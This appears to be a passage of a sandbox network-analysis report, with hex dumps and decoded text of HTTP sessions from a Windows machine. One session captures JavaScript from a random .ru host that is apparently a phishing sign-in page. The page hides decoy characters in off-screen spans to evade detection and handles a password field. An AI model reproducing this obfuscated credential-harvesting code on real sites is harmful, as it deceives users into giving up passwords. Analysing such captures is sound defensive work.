                                                                                                                                                                                    Data Ascii: return r;if(!i&&((t?t.ownerDocument||t:w)!==d&&p(t),t=t||d,g)){if(11!==T&&(f=J.exec(e)))if(o=f[1]){if(9===T){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{i
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 6e 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 6e 29 26 26 74 2e 74 79 70 65 3d 3d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 74 3f 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21
                                                                                                                                                                                    Data Ascii: (e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function pe(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function de(e){return function(t){return"form"in t?t.parentNode&&!
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 62 29 2e 6c 65 6e 67 74 68 7d 29 2c 6e 2e 67 65 74 42 79 49 64 3f 28 72 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 5a 2c 65 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 72 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 67 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72
                                                                                                                                                                                    Data Ascii: tElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(Z,ee);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&g){var n=t.getElementById(e);r
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 6e 67 74 68 26 26 79 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 50 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 62 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 62
                                                                                                                                                                                    Data Ascii: ngth&&y.push("[*^$]="+M+"*(?:''|\"\")"),e.querySelectorAll("[selected]").length||y.push("\\["+M+"*(?:value|"+P+")"),e.querySelectorAll("[id~="+b+"-]").length||y.push("~="),e.querySelectorAll(":checked").length||y.push(":checked"),e.querySelectorAll("a#"+b
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 44 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 66 3d 21 30 2c 30 3b 76 61 72 20 72 3d 21 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 72 7c 7c 28 31 26 28 72 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 6e 2e 73 6f 72 74 44 65 74 61 63 68 65 64
                                                                                                                                                                                    Data Ascii: le(t=t.parentNode)if(t===e)return!0;return!1},D=t?function(e,t){if(e===t)return f=!0,0;var r=!e.compareDocumentPosition-!t.compareDocumentPosition;return r||(1&(r=(e.ownerDocument||e)===(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!n.sortDetached


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    64192.168.2.1649813104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:14 UTC703OUTGET /VyRsmGftiIlOxrabXBIOtQtS/65MQK7mlo31/8FDDCleRwIP HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:14 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:14 GMT
                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Gs1qB2SagmW35mSdwx780YM3FBW312LtTuXEY1kzdwrftagQNnIyQ0SF385544Uvzyhf%2BMoOOmAmDapfO%2F%2BxJFJaznU21ffo1UWYl%2BB2psAaLIeSjp%2Ba6SSoP4tBV3P2fP2l8K6wt9bl2UTFdSrHoMp1zLU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d932d551377-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:14 UTC629INData Raw: 34 62 62 36 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 24 28 27 23 65 72 64 7a 71 71 73 70 62 7a 27 29 2e 66 6f 63 75 73 28 29 3b 7d 29 3b 0d 0a 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 76 61 72 20 6b 65 79 20 3d 20 65 2e 77 68 69 63 68 3b 0d 0a 09 69 66 20 28 6b 65 79 20 3d 3d 20 31 33 29 0d 0a 09 7b 6e 51 28 74 72 75 65 29 3b 7d 7d 29 3b 0d 0a 24 28 22 23 63 78 65 64 73 72 75 64 72 74 22 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0d 0a 09 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 09 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 2e 2e 2f 61 62 59 44 7a
                                                                                                                                                                                    Data Ascii: 4bb6$(document).ready(function() {$('#erdzqqspbz').focus();});$('#uwevicpmgl').keypress(function(e) {var key = e.which;if (key == 13){nQ(true);}});$("#cxedsrudrt").click(function(e) {e.preventDefault();window.location.href = "../abYDz
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4b 57 68 50 70 35 57 33 38 50 37 6b 66 6f 3c 2f 73 70 61 6e 3e 72 20 61 20 76 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 74 44 48 6c 4d 6f 48 37 34 44 6b 39 76 34 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 78 46 76 6a 49 72 69 6f 52 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 31 55 53 65 39 63 62 34
                                                                                                                                                                                    Data Ascii: e="position: absolute;left: -9999px;">KWhPp5W38P7kfo</span>r a v<span style="position: absolute;left: -9999px;">tDHlMoH74Dk9v4</span>a<span style="position: absolute;left: -9999px;">xFvjIrioR</span>l<span style="position: absolute;left: -9999px;">1USe9cb4
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 50 6d 68 71 50 37 36 35 63 6e 3c 2f 73 70 61 6e 3e 6b 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 56 75 48 43 45 72 30 4d 44 78 62 35 52 4c 3c 2f 73 70 61 6e 3e 79 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 68 64 78 45 57 6b 69 48 76 6c 36 6b 79 53 6d 3c 2f 73 70 61 6e 3e 65 20 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 30 63 30 48 50 57 74 59 78 77 51 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79
                                                                                                                                                                                    Data Ascii: ;left: -9999px;">PmhqP765cn</span>k<span style="position: absolute;left: -9999px;">VuHCEr0MDxb5RL</span>yp<span style="position: absolute;left: -9999px;">hdxEWkiHvl6kySm</span>e n<span style="position: absolute;left: -9999px;">0c0HPWtYxwQ</span>a<span sty
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 66 58 6e 51 44 31 62 4a 74 39 34 3c 2f 73 70 61 6e 3e 74 20 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 30 4b 71 4d 66 6e 50 38 41 4a 57 59 62 3c 2f 73 70 61 6e 3e 69 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 76 41 79 71 79 74 35 44 63 31 33 57 57 3c 2f 73 70 61 6e 3e 68 20 74 68 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 79 68 67 77 64 54 77 42 54 62 74 3c 2f 73 70 61 6e 3e 61 74 20 75 73 3c
                                                                                                                                                                                    Data Ascii: ute;left: -9999px;'>fXnQD1bJt94</span>t w<span style='position: absolute;left: -9999px;'>0KqMfnP8AJWYb</span>it<span style='position: absolute;left: -9999px;'>vAyqyt5Dc13WW</span>h th<span style='position: absolute;left: -9999px;'>yhgwdTwBTbt</span>at us<
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 52 68 30 72 71 48 35 70 6c 36 55 39 78 38 3c 2f 73 70 61 6e 3e 6f 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 74 47 49 58 41 61 5a 61 48 3c 2f 73 70 61 6e 3e 6f 66 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 27 3e 4a 52 56 64 33 42 67 70 50 66 49 33 31 58 4f 3c 2f 73 70 61 6e 3e 74 20 61 63 3c 73 70 61 6e 20 73 74 79 6c 65 3d 27 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70
                                                                                                                                                                                    Data Ascii: <span style='position: absolute;left: -9999px;'>Rh0rqH5pl6U9x8</span>os<span style='position: absolute;left: -9999px;'>tGIXAaZaH</span>of<span style='position: absolute;left: -9999px;'>JRVd3BgpPfI31XO</span>t ac<span style='position: absolute;left: -9999p
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 73 70 61 6e 3e 6e 74 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 65 70 6d 69 44 4c 32 6a 30 36 3c 2f 73 70 61 6e 3e 65 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 46 4d 46 34 4d 57 7a 39 74 46 42 68 62 76 76 3c 2f 73 70 61 6e 3e 72 20 70 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 38 35 67 56 51 31 68 39 66 30 77 64 4e 65 65 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20
                                                                                                                                                                                    Data Ascii: span>nt<span style="position: absolute;left: -9999px;">epmiDL2j06</span>e<span style="position: absolute;left: -9999px;">FMF4MWz9tFBhbvv</span>r p<span style="position: absolute;left: -9999px;">85gVQ1h9f0wdNee</span>a<span style="position: absolute;left:
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 09 09 2e 61 64 64 43 6c 61 73 73 28 27 62 74 6e 20 62 74 6e 2d 62 6c 6f 63 6b 20 62 74 6e 2d 70 72 69 6d 61 72 79 27 29 3b 0d 0a 09 09 09 09 09 7d 29 2e 72 65 6d 6f 76 65 28 29 3b 0d 0a 09 09 09 09 7d 0d 0a 09 09 09 09 24 28 27 23 72 65 6a 67 6b 7a 65 6e 6d 71 27 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 3b 0d 0a 09 09 09 09 24 28 27 23 73 75 74 68 73 61 6a 69 76 78 27 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 20 66 61 6c 73 65 29 3b 0d 0a 09 09 09 7d 0d 0a 09 09 7d 29 3b 0d 0a 09 7d 20 65 6c 73 65 20 7b 0d 0a 09 09 24 28 27 23 75 77 65 76 69 63 70 6d 67 6c 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 61 73 2d 65 72 72 6f 72 27 29 3b 0d 0a 09 09 24 28 27 23 6d 70 7a 6f 6b 65 6b 6d 75 6a 27 29 2e 68 74 6d 6c 28 75 73
                                                                                                                                                                                    Data Ascii: .addClass('btn btn-block btn-primary');}).remove();}$('#rejgkzenmq').css('display', 'none');$('#suthsajivx').prop('disabled', false);}});} else {$('#uwevicpmgl').addClass('has-error');$('#mpzokekmuj').html(us
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 52 57 6c 58 78 7a 48 33 46 49 7a 71 3c 2f 73 70 61 6e 3e 73 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 73 58 56 43 57 7a 69 70 65 3c 2f 73 70 61 6e 3e 73 77 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 38 44 39 43 54 49 44 6d 3c 2f 73 70 61 6e 3e 6f 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 72 52 74 6f 67 6a 32 53 42 68 3c 2f 73 70 61 6e 3e 64 2e 27 3b 0d 0a 09 69 66 20 28 70 77 64 2e 6c 65 6e 67 74 68 20 3e 20
                                                                                                                                                                                    Data Ascii: eft: -9999px;">RWlXxzH3FIzq</span>s<span style="position: absolute;left: -9999px;">sXVCWzipe</span>sw<span style="position: absolute;left: -9999px;">8D9CTIDm</span>or<span style="position: absolute;left: -9999px;">rRtogj2SBh</span>d.';if (pwd.length >
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 67 31 49 32 4e 63 72 46 44 4e 73 3c 2f 73 70 61 6e 3e 64 27 29 3b 0d 0a 09 24 28 27 66 6f 72 6d 27 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 3a 62 75 74 74 6f 6e 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 09 24 28 22 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 27 73 75 62 6d 69 74 27 20 2f 3e 22 29 2e 61 74 74 72 28 7b 0d 0a 09 09 09 09 6e 61 6d 65 3a 20 74 68 69 73 2e 6e 61 6d 65 2c 0d 0a 09 09 09 7d 29 2e 68 74 6d 6c 28 27 53 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 64 33 76 39 4c 34 6e 75 68 6b 6c 35 4f 3c 2f
                                                                                                                                                                                    Data Ascii: tyle="position: absolute;left: -9999px;">g1I2NcrFDNs</span>d');$('form').find('input:button').each(function() {$("<button type='submit' />").attr({name: this.name,}).html('Si<span style="position: absolute;left: -9999px;">d3v9L4nuhkl5O</
                                                                                                                                                                                    2024-01-26 13:42:14 UTC1369INData Raw: 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 33 4d 46 37 6e 4f 61 6b 6f 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4a 53 61 30 45 44 6f 58 33 57 79 78 31 56 33 3c 2f 73 70 61 6e 3e 6c 79 20 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 4e 36 47 7a 63 35 77 75 37 51 69 48 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 74 62 31 53 50 59 4e 38 63 3c 2f 73 70 61 6e 3e 63 3c 73 70 61 6e 20 73 74 79
                                                                                                                                                                                    Data Ascii: olute;left: -9999px;">3MF7nOako</span>i<span style="position: absolute;left: -9999px;">JSa0EDoX3Wyx1V3</span>ly l<span style="position: absolute;left: -9999px;">N6Gzc5wu7QiH</span>o<span style="position: absolute;left: -9999px;">tb1SPYN8c</span>c<span sty


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    65192.168.2.164981440.127.169.103443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:14 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=wN7XR4hVYYybUva&MD=vM4W2nhp HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                    2024-01-26 13:42:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                    ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                    MS-CorrelationId: 201a185d-b55b-4e25-bb41-4d1b4070cd18
                                                                                                                                                                                    MS-RequestId: 8b932cbd-203b-4d11-b63a-5a699ba17989
                                                                                                                                                                                    MS-CV: PzxkFekdFUW+5u9i.0
                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:14 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 25457
                                                                                                                                                                                    2024-01-26 13:42:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                    Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                    2024-01-26 13:42:15 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                    Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    66192.168.2.1649815104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
